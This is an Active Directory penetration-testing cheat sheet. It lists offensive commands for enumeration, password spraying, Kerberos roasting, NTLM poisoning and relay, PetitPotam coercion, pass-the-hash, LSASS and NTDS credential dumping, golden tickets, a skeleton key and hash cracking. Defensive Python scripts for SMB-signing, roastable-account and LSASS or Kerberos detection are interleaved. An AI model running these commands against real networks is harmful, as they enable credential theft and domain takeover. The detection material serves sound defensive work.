A complete Active Directory (AD) cheat sheet covering user management, enumeration, PowerShell, LDAP queries, and security tools. Ideal for red teamers, blue teamers, and IT admins in 2025.
This section covers initial network scanning to identify live hosts, open ports, and running services, with a focus on SMB.
Enumerate SMB hosts on a network range.
cme smb <target_range>
Ping scan to discover live hosts (-sP is the legacy alias of -sn on current nmap releases).
nmap -sP <target_range>
Quick scan for the top 50 ports on a specific host.
nmap -PN -sV --top-ports 50 --open <target_ip>
Search for common SMB vulnerabilities.
nmap -PN --script smb-vuln* -p139,445 <target_ip>
A classic, comprehensive scan for services and scripts.
nmap -PN -sC -sV <target_ip>
A full TCP port scan with service and script detection.
nmap -PN -sC -sV -p- <target_ip>
Scan for open UDP ports and services.
nmap -sU -sC -sV <target_ip>
Once you've identified potential targets, the next step is to enumerate Active Directory to understand the domain structure and find users.
Show network info, including the domain and DNS servers.
nmcli dev show <interface>
Find the domain controllers using a DNS query.
nslookup -type=SRV _ldap._tcp.dc._msdcs.<DOMAIN>
Attempt a DNS zone transfer to get all DNS records.
dig axfr @<dns_server> <domain>
Enumerate shares and users with a null session.
enum4linux -a -u "" -p "" <target_ip>
List SMB shares with guest access.
smbmap -u "guest" -p "" -P 445 -H <target_ip>
Enumerate domain users via an anonymous session.
cme smb <target_ip> -u '' -p '' --users
Enumerate LDAP information without brute-forcing.
nmap -n -sV --script "ldap* and not brute" -p 389 <target_ip>
Perform a basic search of the LDAP directory.
ldapsearch -x -h <target_ip> -s base
This section details common attack vectors to gain initial access to a user account or system.
Get the domain password policy.
cme smb <target_ip> -u '<user>' -p '<pass>' --pass-pol
Spray a list of passwords against a user list.
cme smb -u user.txt -p password.txt <target_ip>
Get crackable password hashes for users with Kerberos pre-authentication disabled.
GetNPUsers.py <domain>/ -usersfile <user_list> -format hashcat
BloodHound (Cypher) query to find AS-REP roastable users; the RETURN clause is required for the query to produce results.
MATCH (u:User {dontreqpreauth:true}) RETURN u
Find hosts that do not require SMB signing.
nmap --script smb-security-mode -p445 <target_range>
Poison LLMNR/NBT-NS to capture hashes.
responder -I <interface>
Relay captured credentials to other machines.
ntlmrelayx.py -tf targets.txt -socks -smb2support
Perform an IPv6 DNS takeover attack.
mitm6 -d <domain>
Coerce authentication from a machine for NTLM relay attacks.
PetitPotam.py -d <domain> <attacker_ip> <target_ip>
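The responder / ntlmrelayx / mitm6 / PetitPotam chain above only works against SMB servers that will accept an unsigned session, which is exactly what the smb-security-mode scan reports. As an added defender-side example (not part of the original cheat sheet), this script parses the normal-format output of `nmap --script smb-security-mode -p445` and lists the hosts that still need signing enforced. The nmap output embedded below is constructed for the example, not a real scan; the regexes assume nmap's standard "Nmap scan report for" and "message_signing:" line layout.

```python
import re
from typing import Dict, List

# Constructed sample of normal-format output from
# `nmap --script smb-security-mode -p445 <target_range>`; not a real scan.
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for 10.0.0.5
Host is up (0.0010s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

Nmap scan report for dc01.corp.local (10.0.0.10)
Host is up (0.0012s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-security-mode:
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required

Nmap scan report for 10.0.0.22
Host is up (0.0030s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: supported
"""

# "Nmap scan report for host (ip)" or "Nmap scan report for ip"
HOST_RE = re.compile(r"^Nmap scan report for (\S+)(?: \((\S+)\))?")
# "|_  message_signing: disabled (...)" / "|   message_signing: required"
SIGNING_RE = re.compile(r"^\|_?\s+message_signing:\s*(\w+)")


def parse_signing(output: str) -> Dict[str, str]:
    """Map each scanned host (IP preferred over hostname) to its message_signing value."""
    hosts: Dict[str, str] = {}
    current = None
    for line in output.splitlines():
        m = HOST_RE.match(line)
        if m:
            current = m.group(2) or m.group(1)
            continue
        m = SIGNING_RE.match(line)
        if m and current:
            hosts[current] = m.group(1).lower()
    return hosts


def relay_exposed(hosts: Dict[str, str]) -> List[str]:
    """Hosts where signing is not *required*. Both 'disabled' and 'supported' leave the
    server willing to accept an unsigned session, which is all a relay needs; only
    'required' closes the door."""
    return sorted(h for h, status in hosts.items() if status != "required")


if __name__ == "__main__":
    found = parse_signing(SAMPLE_NMAP_OUTPUT)
    for host in relay_exposed(found):
        print(f"{host}: message_signing={found[host]} -> enforce SMB signing")
```

Domain controllers require signing by default, which is why dc01 drops out of the list; member servers and workstations report "disabled" or "supported" until the "Microsoft network server: Digitally sign communications (always)" policy is enabled for them.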
Once you have credentials, these commands help you move through the network and escalate privileges.
With Valid Credentials
Get a list of all domain users.
GetADUsers.py -all -dc-ip <dc_ip> <domain>/<user>:<pass>
Enumerate accessible SMB shares with the user's credentials.
cme smb <target_ip> -u <user> -p <pass> --shares
Run the BloodHound collector to map the domain.
bloodhound-python -d <domain> -u <user> -p <pass> -gc <dc_ip> -c all
Get crackable hashes for service accounts.
GetUserSPNs.py -request -dc-ip <dc_ip> <domain>/<user>:<pass>
BloodHound (Cypher) query to find Kerberoastable users; the RETURN clause is required for the query to produce results.
MATCH (u:User {hasspn:true}) RETURN u
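Both BloodHound queries on this page (dontreqpreauth for AS-REP roasting, hasspn for Kerberoasting) are answering a question that can also be put to LDAP directly via userAccountControl bits and the servicePrincipalName attribute. As an added example (not part of the original cheat sheet, and not BloodHound's or Impacket's code), the script below builds the equivalent LDAP bit-test filter and then runs the same audit over a constructed set of account records, ranking which Kerberoastable accounts to fix first. The account data is invented for the example; the userAccountControl constants and the matching-rule OID are the real Active Directory values.

```python
from dataclasses import dataclass, field
from typing import Dict, List

# userAccountControl bits (ADS_USER_FLAG_ENUM values).
UF_ACCOUNTDISABLE = 0x0002
UF_NORMAL_ACCOUNT = 0x0200
UF_WORKSTATION_TRUST_ACCOUNT = 0x1000
UF_DONT_EXPIRE_PASSWD = 0x10000
UF_DONT_REQUIRE_PREAUTH = 0x400000

# LDAP_MATCHING_RULE_BIT_AND: lets an LDAP filter test individual userAccountControl bits.
BIT_AND = "1.2.840.113556.1.4.803"


def uac_filter(flag: int) -> str:
    """LDAP filter for enabled user objects that have the given userAccountControl bit set.
    uac_filter(UF_DONT_REQUIRE_PREAUTH) is the ldapsearch equivalent of the dontreqpreauth query."""
    return (
        "(&(objectCategory=person)(objectClass=user)"
        f"(userAccountControl:{BIT_AND}:={flag})"
        f"(!(userAccountControl:{BIT_AND}:={UF_ACCOUNTDISABLE})))"
    )


@dataclass
class Account:
    sam: str
    uac: int
    spns: List[str] = field(default_factory=list)
    member_of: List[str] = field(default_factory=list)


# Constructed sample directory; none of these are real accounts.
SAMPLE_ACCOUNTS = [
    Account("alice", UF_NORMAL_ACCOUNT),
    Account("legacy.app", UF_NORMAL_ACCOUNT | UF_DONT_REQUIRE_PREAUTH),
    Account("old.svc", UF_NORMAL_ACCOUNT | UF_DONT_REQUIRE_PREAUTH | UF_ACCOUNTDISABLE),
    Account("svc_sql", UF_NORMAL_ACCOUNT | UF_DONT_EXPIRE_PASSWD,
            spns=["MSSQLSvc/sql01.corp.local:1433"],
            member_of=["CN=Domain Admins,CN=Users,DC=corp,DC=local"]),
    Account("svc_web", UF_NORMAL_ACCOUNT, spns=["HTTP/web01.corp.local"]),
    Account("krbtgt", UF_NORMAL_ACCOUNT | UF_ACCOUNTDISABLE, spns=["kadmin/changepw"]),
    Account("WS01$", UF_WORKSTATION_TRUST_ACCOUNT, spns=["HOST/ws01.corp.local"]),
]


def enabled(a: Account) -> bool:
    return not a.uac & UF_ACCOUNTDISABLE


def asrep_roastable(accounts: List[Account]) -> List[str]:
    """Enabled accounts whose AS-REP the KDC will hand out without pre-authentication."""
    return [a.sam for a in accounts if enabled(a) and a.uac & UF_DONT_REQUIRE_PREAUTH]


def kerberoastable(accounts: List[Account]) -> List[str]:
    """Enabled user (not computer) accounts carrying an SPN. krbtgt is excluded because
    its key is random rather than a human-chosen password; computer accounts ($) likewise."""
    return [a.sam for a in accounts
            if enabled(a) and a.spns and not a.sam.endswith("$") and a.sam.lower() != "krbtgt"]


def remediation_priority(accounts: List[Account]) -> Dict[str, List[str]]:
    """Kerberoastable accounts that deserve the first password rotation or gMSA migration."""
    findings: Dict[str, List[str]] = {}
    roastable = set(kerberoastable(accounts))
    for a in accounts:
        if a.sam not in roastable:
            continue
        reasons = []
        if any("CN=Domain Admins," in dn for dn in a.member_of):
            reasons.append("member of Domain Admins")
        if a.uac & UF_DONT_EXPIRE_PASSWD:
            reasons.append("password never expires")
        if reasons:
            findings[a.sam] = reasons
    return findings


if __name__ == "__main__":
    print("AS-REP roastable:", asrep_roastable(SAMPLE_ACCOUNTS))
    print("Kerberoastable:", kerberoastable(SAMPLE_ACCOUNTS))
    print("Fix first:", remediation_priority(SAMPLE_ACCOUNTS))
```

The SPN side has no single bit to test, so the ldapsearch equivalent of the hasspn query is the plain filter `(&(objectCategory=person)(objectClass=user)(servicePrincipalName=*))`; the remediation for the pre-authentication finding is simply clearing "Do not require Kerberos preauthentication" on the account.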
Execute commands remotely using a user's NTLM hash.
psexec.py -hashes ':<nt_hash>' <user>@<target_ip>
Execute commands remotely via WMI with a hash.
wmiexec.py -hashes ':<nt_hash>' <user>@<target_ip>
Open an interactive remote shell using a hash.
evil-winrm -i <target_ip> -u <user> -H <nt_hash>
Execute commands using a Kerberos ticket already loaded in the KRB5CCNAME cache (Pass the Key / Pass the Ticket; -no-pass skips the password prompt).
psexec.py <domain>/<user>@<target_ip> -k -no-pass
Techniques to achieve full control over the Active Directory domain.
Credential Dumping
Dump all domain hashes from the NTDS.dit file on a Domain Controller.
secretsdump.py <domain>/<user>:<pass>@<dc_ip>
Dump the LSASS process memory to extract cleartext passwords.
procdump.exe -accepteula -ma lsass.exe lsass.dmp
Parse the LSASS dump file to reveal credentials.
mimikatz "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords"
Remotely dump LSASS using CrackMapExec.
cme smb <target_ip> -u <user> -p <pass> -M lsassy
Add a user to the Domain Admins group.
net group "domain admins" <user> /add /domain
Create a golden ticket to impersonate any user.
ticketer.py -nthash <krbtgt_hash> -domain-sid <sid> -domain <domain> <user>
Inject a skeleton key into LSASS, allowing a master password for all users.
mimikatz "privilege::debug" "misc::skeleton"
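Every LSASS technique in this section (procdump, sekurlsa, lsassy) has to open a handle to lsass.exe with read access to its memory, and Sysmon records exactly that as Event ID 10 (ProcessAccess). As an added detection example (not part of the original cheat sheet, and not Sysmon's or any vendor's rule), the script below flags processes outside a baseline allowlist that open lsass.exe with PROCESS_VM_READ in the granted access mask. The event lines are a constructed key=value flattening of Sysmon records rather than the native XML, and the allowlist is an illustrative starting point that has to be tuned to the estate.

```python
import re
from typing import Dict, List

# Constructed Sysmon records flattened to key=value lines (not native Sysmon XML).
# EventID 10 = ProcessAccess. Values may contain spaces, so a plain split() will not do.
SAMPLE_SYSMON = r"""
EventID=10 SourceImage=C:\Windows\System32\svchost.exe TargetImage=C:\Windows\System32\lsass.exe GrantedAccess=0x1000
EventID=10 SourceImage=C:\Program Files\Windows Defender\MsMpEng.exe TargetImage=C:\Windows\System32\lsass.exe GrantedAccess=0x1FFFFF
EventID=10 SourceImage=C:\Users\jdoe\Downloads\procdump.exe TargetImage=C:\Windows\System32\lsass.exe GrantedAccess=0x1FFFFF
EventID=10 SourceImage=C:\Windows\Temp\upd.exe TargetImage=C:\Windows\System32\lsass.exe GrantedAccess=0x1010
EventID=10 SourceImage=C:\Windows\Temp\upd.exe TargetImage=C:\Windows\System32\notepad.exe GrantedAccess=0x1FFFFF
EventID=1 Image=C:\Windows\Temp\upd.exe CommandLine=upd.exe
"""

# key=value pairs where the value runs until the next " key=" or end of line.
FIELD_RE = re.compile(r"(\w+)=(.*?)(?=\s\w+=|$)")

# Process access rights (Win32): the bit a memory dump cannot do without.
PROCESS_VM_READ = 0x0010

# Illustrative baseline of processes expected to touch LSASS; tune per environment.
ALLOWLIST = {
    r"c:\windows\system32\svchost.exe",
    r"c:\program files\windows defender\msmpeng.exe",
}


def parse_sysmon(text: str) -> List[Dict[str, str]]:
    """Parse the flattened records into dicts, one per non-empty line."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if line:
            events.append(dict(FIELD_RE.findall(line)))
    return events


def suspicious_lsass_access(text: str) -> List[str]:
    """SourceImage of every non-allowlisted process that opened lsass.exe with VM_READ."""
    hits = []
    for ev in parse_sysmon(text):
        if ev.get("EventID") != "10":
            continue
        if not ev.get("TargetImage", "").lower().endswith(r"\lsass.exe"):
            continue
        granted = int(ev.get("GrantedAccess", "0x0"), 16)
        if not granted & PROCESS_VM_READ:
            continue  # e.g. 0x1000 = PROCESS_QUERY_LIMITED_INFORMATION only
        if ev.get("SourceImage", "").lower() in ALLOWLIST:
            continue
        hits.append(ev["SourceImage"])
    return hits


if __name__ == "__main__":
    for image in suspicious_lsass_access(SAMPLE_SYSMON):
        print(f"ALERT: {image} read LSASS memory")
```

The 0x1000 svchost line is the normal background noise this filter is meant to drop; procdump's 0x1FFFFF (PROCESS_ALL_ACCESS) and the 0x1010 handle from the temp-directory binary both carry the read bit and are reported. Enabling LSA Protection (RunAsPPL) or Credential Guard reduces what such a handle can yield, but the Sysmon event is still the earliest signal.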
Crack LM hashes with a mask (brute-force) attack; hashcat mode 3000.
hashcat -m 3000 -a 3 hash.txt
Crack NTLM (NT) hashes with a mask attack; mode 1000.
hashcat -m 1000 -a 3 hash.txt
Crack NTLMv2 (Net-NTLMv2) challenge/response hashes with a wordlist; mode 5600.
hashcat -m 5600 -a 0 hash.txt rockyou.txt
Crack Kerberos 5 TGS-REP (Kerberoast, etype 23/RC4) hashes with a wordlist; mode 13100.
hashcat -m 13100 -a 0 spn.txt rockyou.txt
Crack Kerberos 5 AS-REP (etype 23/RC4) hashes with a wordlist; mode 18200.
hashcat -m 18200 -a 0 hashes.txt rockyou.txt
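The two Kerberos hash formats above (modes 13100 and 18200) only exist because a domain controller issued an RC4 ticket, and it logs each issuance: Event ID 4768 for the AS-REP and 4769 for the TGS-REP, both carrying the ticket encryption type (0x17 is RC4-HMAC, the crackable etype 23) and, for 4768, the pre-authentication type. As an added defender-side example (not part of the original cheat sheet and not any SIEM's shipped rule), the script below runs those two checks over a constructed, simplified key=value rendering of the events: successful TGTs issued with no pre-authentication, and clients that request RC4 service tickets for several user SPNs in a short window, which is what a bulk GetUserSPNs.py run looks like on the KDC. The event lines are invented; the event IDs, etype value and status code are the real ones.

```python
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List

# Constructed sample rendered as simplified key=value lines, not the native Security-log XML.
# 4768 = TGT request (AS-REQ/AS-REP), 4769 = service ticket request (TGS-REQ/TGS-REP).
# PreAuthType 0 = no pre-authentication; Status 0x0 = issued, 0x19 = KDC_ERR_PREAUTH_REQUIRED.
SAMPLE_EVENTS = """\
2025-01-10T09:00:01 EventID=4768 Account=alice ClientIP=10.0.0.50 PreAuthType=2 EncType=0x12 Status=0x0
2025-01-10T09:00:05 EventID=4768 Account=legacy.app ClientIP=10.0.0.77 PreAuthType=0 EncType=0x17 Status=0x0
2025-01-10T09:00:06 EventID=4768 Account=bob ClientIP=10.0.0.77 PreAuthType=0 EncType=0x17 Status=0x19
2025-01-10T09:01:00 EventID=4769 Account=bob ClientIP=10.0.0.50 Service=WS01$ EncType=0x12 Status=0x0
2025-01-10T09:02:00 EventID=4769 Account=bob ClientIP=10.0.0.77 Service=svc_sql EncType=0x17 Status=0x0
2025-01-10T09:02:01 EventID=4769 Account=bob ClientIP=10.0.0.77 Service=svc_http EncType=0x17 Status=0x0
2025-01-10T09:02:02 EventID=4769 Account=bob ClientIP=10.0.0.77 Service=svc_backup EncType=0x17 Status=0x0
2025-01-10T09:02:03 EventID=4769 Account=bob ClientIP=10.0.0.77 Service=krbtgt EncType=0x17 Status=0x0
2025-01-10T09:10:00 EventID=4769 Account=carol ClientIP=10.0.0.51 Service=svc_web EncType=0x17 Status=0x0
"""

RC4_HMAC = "0x17"  # etype 23; AES tickets (0x11/0x12) are not practical to crack offline


def parse_events(text: str) -> List[Dict[str, object]]:
    """Turn each '<timestamp> key=value ...' line into a dict with a parsed 'time'."""
    events: List[Dict[str, object]] = []
    for line in text.splitlines():
        stamp, _, rest = line.partition(" ")
        if not rest:
            continue
        ev: Dict[str, object] = dict(kv.split("=", 1) for kv in rest.split())
        ev["time"] = datetime.fromisoformat(stamp)
        events.append(ev)
    return events


def asrep_without_preauth(events: List[Dict[str, object]]) -> List[str]:
    """Accounts that actually received a TGT (Status 0x0) with PreAuthType 0.
    A 0x19 failure means pre-auth is enforced and nothing crackable left the KDC."""
    return [str(e["Account"]) for e in events
            if e.get("EventID") == "4768" and e.get("PreAuthType") == "0"
            and e.get("Status") == "0x0"]


def rc4_service_ticket_bursts(events: List[Dict[str, object]], threshold: int = 3,
                              window: timedelta = timedelta(seconds=60)) -> Dict[str, List[str]]:
    """Clients that obtained RC4 tickets for >= threshold distinct user SPNs inside one window.
    Computer SPNs ($) and krbtgt are skipped: their keys are random, so nobody roasts them."""
    per_client: Dict[str, List[tuple]] = defaultdict(list)
    for e in events:
        svc = str(e.get("Service", ""))
        if (e.get("EventID") == "4769" and e.get("EncType") == RC4_HMAC
                and e.get("Status") == "0x0"
                and not svc.endswith("$") and svc.lower() != "krbtgt"):
            per_client[str(e["ClientIP"])].append((e["time"], svc))
    flagged: Dict[str, List[str]] = {}
    for client, reqs in per_client.items():
        reqs.sort()
        for i, (start, _) in enumerate(reqs):
            in_window = {s for t, s in reqs[i:] if t - start <= window}
            if len(in_window) >= threshold:
                flagged[client] = sorted(in_window)
                break
    return flagged


if __name__ == "__main__":
    evs = parse_events(SAMPLE_EVENTS)
    print("AS-REP issued without pre-auth:", asrep_without_preauth(evs))
    print("RC4 service-ticket bursts:", rc4_service_ticket_bursts(evs))
```

The threshold and window are tuning knobs, not fixed values; the durable fix on the KDC side is moving service accounts to AES-only (msDS-SupportedEncryptionTypes) so that 4769 stops showing 0x17 at all.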